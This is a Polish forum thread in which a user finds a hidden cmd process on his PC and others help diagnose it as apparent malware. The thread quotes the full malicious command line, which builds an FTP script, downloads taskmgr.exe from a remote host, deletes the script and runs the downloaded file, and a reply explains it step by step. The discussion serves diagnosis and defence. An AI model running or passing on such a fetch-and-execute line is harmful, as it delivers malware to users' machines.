Jakiś Syf Czy Co?

[PelzaK]

witam, od paru dni, bodajże dwóch męczy mego kompa cuś dziwnego...

 

Wcześniej nie uznałem tego za jakiś problem... ale..

 

pierwsza sprawa.. firewall zgłosił mi próbę dostępu programu ftp.exe do jakiegoś servera, dziś do komputera BASIA - domyślam się ze to ktoś z sieci.. oczywiście blok...

 

potem zauwazyłem że w menagerze programów (używam processexplorera) lsass.exe który sprawuje pieczę nad uslugami:

• magazyn chroniony
• menager kont zabezpieczeń
• usługi IPSEC

ma uruchomiony proces potomny cmd (mimo że okna nie widać na ekranie)... ten z kolei ma uruchomiony menager programów, którego tekże nie widać. Co dziwne, domyślnym menagerem jest processexplorer (www.sysinternals.com) i ma ustawiony tryb pojedynczego okna, a gdy wywołam go za pomocą alt+ctrl+del pojawiają się procesy takie...

 

sprawdziłem jak został uruchomiony ten cmd... i znalazłęm coś takiego

 

cmd /k echo open 10.0.27.77 2663 > o&echo user 1 1 >> o &echo get taskmgr.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &taskmgr.exe

wydało mi się to podejrzane, tu używany jest ten ftp, ale co to dokładnie robi to nie wiem.. czy ktoś może rozszyfrować to? Widzę jakieś przekazywanie strumienia.. ale rozkminianie składni takiej nie jest moja mocną stroną :)

 

Idąc dalej... zauważyłę że przestał działać klawisz F1 oraz klawisz 2 (nie ten na numpadzie)... Gdy robiłem skanowanie hdd antywirem (nic nie wykrył) i użycie cpu sięgało 100% wtedy kilkukrotne naciskanie klawisza 2 spowodowało pojawienie się dwójki... ale gdy cpu jest w stanie idle nie da się już tego powtórzyć... domyślam się że jakiś chłam blokuje klawisze (jeśli to ma związek).

 

Do tego nie mogę wyświetlić Informacji o systemie - twierdzą że admin mi to zablokował...

 

Log z HI Jacka wygląda czysto, tylko aplikacje które znam... moze poza tym...

 

O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx

O9 - Extra button: Related (HKLM)

O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)

 

ktoś ma jakiś pomysł?

[SGJ]

"open 10.0.27.77 2663 > o&echo user 1 1 >> o &echo get taskmgr.exe >> o &echo quit >> o "

przekierowanie do pliku

open 10.0.27.77 2663

user 1 1

get taskmgr.exe

quit

 

co automatycznie loguje do ftp i pobiera tasmkgr

 

ftp -n -s:o

 

załadowanie polecen z pliku

 

del /F /Q o

 

skasowanie pliu

 

uruchomienie pobranego taskmgr

[PelzaK]

no tak logicznie wynika z treści komendy.. ale po co ktoś/coś wykonuje owo zadanie? Czy to celowe działanie windowsa (sprzeciw na program zastępczy taskmgr) czy jakiś syf próbujący pobrać sfabrykowany taskmgr....

 

co do klawiszy to usterka okazała się o dziwo fizyczna... bo wszystko wskazywało że fizyczną nie jest :)

[SGJ]

No jak dla mnie to jakiś syf.

Sprawdz w system32 plik taskmgr.exe czy to jest plik od ms, czy nie. Jak masz processexplorera to i tak nawet ręczne uruchomienie taskmgr uruchomi processexplorera, bo wpis w rejestrze zmusza system do wywolania go.

[avecezary]

witam

podejzyj co tam na kablu sie dzieje:

netstat -v -b

[PelzaK]

właściwości taskmgr.exe mówią iż wyszło to spod ręki billa. Swoja drogą zastanawiam się na ile te informacje są wiarygodne - pisząc program można wstawić dowolny opis do pliku exe...

 

na kablu nic się nie dzieje.. próba łączenia przez ftp wystąpiła 2 dni pod rząd ale tylko przy pierwszym uruchomieniu kompa... późniejsze resety już tego nie powodowały... A że ubiłem dziada to i cisza w sieci zapadła absolutna :)

 

Sprawdziłem wszystkie możliwe autoruny i nic tam nie ma czego wcześniej nie było... Zazwyczaj problemów z shitem nie miałem... wirusy czy robale na moim kompie to praktycznie wymarły gatunek...

 

No nic.. zaczekam do następnej próby...